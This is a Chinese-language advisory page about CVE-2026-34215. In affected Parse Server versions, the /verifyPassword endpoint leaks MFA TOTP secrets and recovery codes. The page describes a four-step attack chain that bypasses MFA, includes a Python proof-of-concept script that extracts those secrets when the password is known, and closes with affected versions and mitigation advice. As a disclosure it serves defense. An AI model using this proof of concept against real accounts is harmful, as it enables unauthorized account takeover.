IPBUF安全漏洞报告
English
CVE-2026-34215 CVSS 6.5 中危

CVE-2026-34215 Parse Server验证端点信息泄露漏洞

披露日期: 2026-03-31
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-34215
漏洞类型
信息泄露
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Parse Server

相关标签

信息泄露MFA绕过Parse Server敏感数据暴露认证缺陷

漏洞概述

Parse Server在特定版本前存在信息泄露漏洞。验证密码端点返回未经过滤的认证数据,攻击者若知晓用户密码,可利用此漏洞获取MFA密钥等敏感信息,从而绕过多因素认证保护。

技术细节

该漏洞源于Parse Server的verify password端点在处理验证请求时,未对响应中的敏感认证数据进行适当的清理或过滤。具体而言,当用户调用该端点验证密码时,服务器响应意外包含了MFA TOTP(基于时间的一次性密码)密钥、恢复代码以及OAuth访问令牌等高敏感信息。攻击者在已知目标用户密码的前提下,向该端点发起验证请求,即可从响应报文中直接提取MFA密钥。利用提取的密钥,攻击者能够生成合法的验证码,从而绕过多因素认证(MFA)的安全保护,实现对用户账户的未授权访问。

攻击链分析

STEP 1
1. 信息收集
攻击者通过其他手段(如网络钓鱼、密码泄露数据库)获取目标用户的登录密码。
STEP 2
2. 发起请求
攻击者使用获取到的密码,向Parse Server的/verifyPassword端点发送验证请求。
STEP 3
3. 提取密钥
分析服务器返回的JSON响应,从中提取未经过滤的MFA TOTP密钥或恢复代码。
STEP 4
4. 绕过认证
使用提取的MFA密钥生成合法的动态验证码,结合已知的密码完成登录,成功绕过多因素认证。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration target_url = "https://example.com/parse/verifyPassword" username = "[email protected]" password = "user_known_password" # Payload for the request payload = { "username": username, "password": password } try: # Send POST request to verify password response = requests.post(target_url, json=payload) if response.status_code == 200: data = response.json() # Check if MFA secrets are exposed in the response # The vulnerability is that these fields are returned when they shouldn't be if 'mfaSecret' in data or 'totpSecret' in data: print("[+] Vulnerability confirmed!") print(f"[+] Extracted MFA Secret: {data.get('mfaSecret', data.get('totpSecret'))}") print("[+] Recovery Codes: {}".format(data.get('recoveryCodes'))) else: print("[-] MFA Secret not found in response. System might be patched.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}")

影响范围

Parse Server < 8.6.63
Parse Server < 9.7.0-alpha.7

防御指南

临时缓解措施
建议立即将Parse Server升级至修复版本。如果无法立即升级,应通过网络访问控制列表(ACL)限制对/verifyPassword端点的访问,仅允许受信任的IP地址调用,并密切监控API响应内容及日志,确保未包含敏感的MFA信息。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表